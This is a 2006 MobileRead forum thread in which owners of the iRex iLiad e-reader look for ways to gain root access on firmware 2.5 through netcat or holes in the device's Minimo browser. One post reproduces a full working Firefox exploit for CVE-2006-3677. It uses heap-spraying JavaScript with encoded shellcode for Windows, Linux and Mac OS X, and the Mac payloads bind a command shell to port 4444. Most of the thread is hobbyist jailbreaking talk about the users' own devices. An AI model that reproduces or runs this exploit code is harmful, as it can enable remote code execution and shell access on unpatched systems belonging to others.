Register Guidelines E-Books Search Today's Posts Mark Forums Read

Go Back   MobileRead Forums > E-Book Readers > More E-Book Readers > iRex > iRex Developer's Corner

Notices

Reply
 
Thread Tools Search this Thread
Old 07-29-2006, 11:05 AM   #1
TadW
Uebermensch
TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.
 
TadW's Avatar
 
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Status quo

Can you tell me what is the current status quo for gaining root access in firmware 2.5? I know some people tried to brute force the password, alas that could take a *long* time.
TadW is offline   Reply With Quote
Old 07-29-2006, 12:00 PM   #2
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Brute forcing the pasword will not be needing, because a netcat can be installed, and even busybox incoporates one.

What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and also to enable the save as... window in any application would work.

I do not know how to do it. An interesting list of mozilla bugs is here
http://searchsecurity.techtarget.com...180286,00.html
but I do not know if they apply to the modifyed minimo browser we run.

Any other starting points should be appreciated.

Users of 2.4 can try to upgrade to 2.5 keeping control along a delicate process, which I failed to complete sucessfully (but I describe in a separate thread).
arivero is offline   Reply With Quote
Advert
Old 07-29-2006, 12:35 PM   #3
TadW
Uebermensch
TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.
 
TadW's Avatar
 
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?
TadW is offline   Reply With Quote
Old 07-29-2006, 01:18 PM   #4
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by TadW
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?
If i could safely assume it is to be soon, I would not be looking into this, as their promise is that any developer wil be able to run their own readers. I am not worried if I need to run xdvi as user instead of root. But yes, a motive for the delay is, I guess, that they need to discuss and decide if they need a user separated from root, so a possible consequence of the delay is that the machine will be theoretically more restricted internally.
arivero is offline   Reply With Quote
Old 07-29-2006, 01:39 PM   #5
TadW
Uebermensch
TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.
 
TadW's Avatar
 
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

Quote:
The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution
TadW is offline   Reply With Quote
Advert
Old 07-29-2006, 01:43 PM   #6
TadW
Uebermensch
TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.TadW ought to be getting tired of karma fortunes by now.
 
TadW's Avatar
 
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Here the full code of the exploit. Seems it requires a Java plugin which I am not sure exists in the case of Minimo.

Code:
<script>

// MoBB Demonstration
function Demo() {

	// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
	// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
	// CVE-2006-3677

	// The Java plugin is required for this to work

	// win32 = calc.exe
	var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
	var fill_win32 = unescape('%u0800');
	var addr_win32 = 0x08000800;
	
	// linux = touch /tmp/METASPLOIT (unreliable)
	var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
	var fill_linux = unescape('%ua8a8');
	var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

	// mac os x ppc = bind a shell to 4444
	var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
	var fill_macppc = unescape('%u0c0c');
	var addr_macppc = 0x0c000000;
	
	// mac os x intel = bind a shell to 4444
	// Thanks to nemo[at]felinemenace.org for shellcode
	// Thanks to Todd Manning for the target information and testing
	var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
	var fill_macx86 = unescape('%u1c1c');
	var addr_macx86 = 0x1c000000;		


	// Start the browser detection
	var shellcode;
	var addr;
	var fill;
	var ua = '' + navigator.userAgent;

	if (ua.indexOf('Linux') != -1) {
		alert('Trying to create /tmp/METASPLOIT');
		shellcode = shellcode_linux;
		addr = addr_linux;
		fill = fill_linux;
	}
	
	if (ua.indexOf('Windows') != -1) {
		alert('Trying to launch Calculator');	
		shellcode = shellcode_win32;
		addr = addr_win32;
		fill = fill_win32;
	}	

	if (ua.indexOf('PPC Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macppc;
		addr = addr_macppc;
		fill = fill_macppc;
	}	
	
	if (ua.indexOf('Intel Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macx86;
		addr = addr_macx86;
		fill = fill_macx86;
	}
			
	if (! shellcode) {
		alert('OS not supported, only attempting a crash!');
		shellcode = unescape('%ucccc');
		fill = unescape('%ucccc');
		addr = 0x02020202;
	}
		
	var b = fill;
	while (b.length <= 0x400000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
			
	
	if (window.navigator.javaEnabled) {
		window.navigator = (addr / 2);
		try {
			java.lang.reflect.Runtime.newInstance(
				java.lang.Class.forName("java.lang.Runtime"), 0
			);
			alert('Patched!');
		}catch(e){
			alert('No Java plugin installed!');
		}
	}
}

</script>
TadW is offline   Reply With Quote
Old 07-29-2006, 01:45 PM   #7
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by TadW
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...
It is a java plugin explit in theory. But I am going to give a try.
arivero is offline   Reply With Quote
Old 07-29-2006, 02:42 PM   #8
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
I see some no-crack alternatives:

1)If chrome privileges are enabled or they can be reached, then a New File ('/tmp/example') javascript call is all we need. See http://docs.mandragor.org/files/Misc...-5-sect-5.html
Problem being, I am not sure how fully the js libraries are provided in mozilla minimo (it is minimo). But perhaps they can be provided from any external file.

2)To learn how to build a javascript navigation toolbar *including Save As... button*; this button is disabled in minimo but it should exist. Perhaps toinvoke it does not require chrome priviledges.
arivero is offline   Reply With Quote
Old 07-29-2006, 02:52 PM   #9
tribble
iLiad Maniac
tribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it is
 
tribble's Avatar
 
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.

/edit: tried to install an xpi, but cant do that either.
tribble is offline   Reply With Quote
Old 07-29-2006, 03:11 PM   #10
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
/edit: tried to install an xpi, but cant do that either.
I got to run the typical UML demo when you press a button and then a javascript application appears.
arivero is offline   Reply With Quote
Old 07-29-2006, 03:22 PM   #11
tribble
iLiad Maniac
tribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it istribble knows what time it is
 
tribble's Avatar
 
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
Quote:
Originally Posted by arivero
I got to run the typical UML demo when you press a button and then a javascript application appears.
But you cant save anything there. The xpi plugins have full acces to the filesystem
tribble is offline   Reply With Quote
Old 07-30-2006, 10:51 AM   #12
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.

/edit: tried to install an xpi, but cant do that either.
The mess is that they use the libs of minimo but they modifyed the browser start-up application (called "browser", no "minimo", and installed from a different package).
arivero is offline   Reply With Quote
Old 07-30-2006, 03:18 PM   #13
Gavrahil
Member
Gavrahil began at the beginning.
 
Posts: 22
Karma: 10
Join Date: May 2006
Device: Sony Librié
Just as a clarification for the techno-idiot (me)... Wit 2.4 you could install all kinds of stuff and play with the system and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!
Gavrahil is offline   Reply With Quote
Old 07-30-2006, 04:05 PM   #14
R2D2
Mad Scientist
R2D2 doesn't litterR2D2 doesn't litterR2D2 doesn't litter
 
R2D2's Avatar
 
Posts: 294
Karma: 242
Join Date: May 2006
Location: Germany
Device: Zaurus, HTCMagician, iLiad
Gavrahil, I would say:

With 2.4 you could try to install all kinds of stuff and try to play with the system.
R2D2 is offline   Reply With Quote
Old 07-31-2006, 06:11 AM   #15
arivero
Guru
arivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it isarivero knows what time it is
 
arivero's Avatar
 
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
But you cant save anything there. The xpi plugins have full acces to the filesystem
It seems that they at iRex have modified the browser beyond minimo.

I was not expecting to need a xpi plugin; perhaps something simpler as old IE
document.execCommand('SaveAs')
that requires user interaction and should not be a priviledged command after all.


PS: Mozilla security releases are at
http://www.mozilla.org/projects/secu...abilities.html
arivero is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Historical Fiction Sienkiewicz, Henryk: Quo Vadis (german) v1.0 02 Feb 2010 Josch91 BBeB/LRF Books 0 02-02-2010 10:34 AM
Historical Fiction Sienkiewicz, Henryk: Quo Vadis (german) v1.0 02 Feb 2010 Josch91 ePub Books 0 02-02-2010 10:33 AM
Other Fiction Sienkiewicz, Henryk: Quo Vadis? german 16.11.2009 Insider ePub Books 0 11-15-2009 11:26 PM
On the sad status quo of the Mobile Web Colin Dunstan Lounge 4 04-26-2005 09:47 AM
Status Quo Alexander Turcic Announcements 11 11-29-2003 08:14 AM


All times are GMT -4. The time now is 07:17 AM.


MobileRead.com is a privately owned, operated and funded community.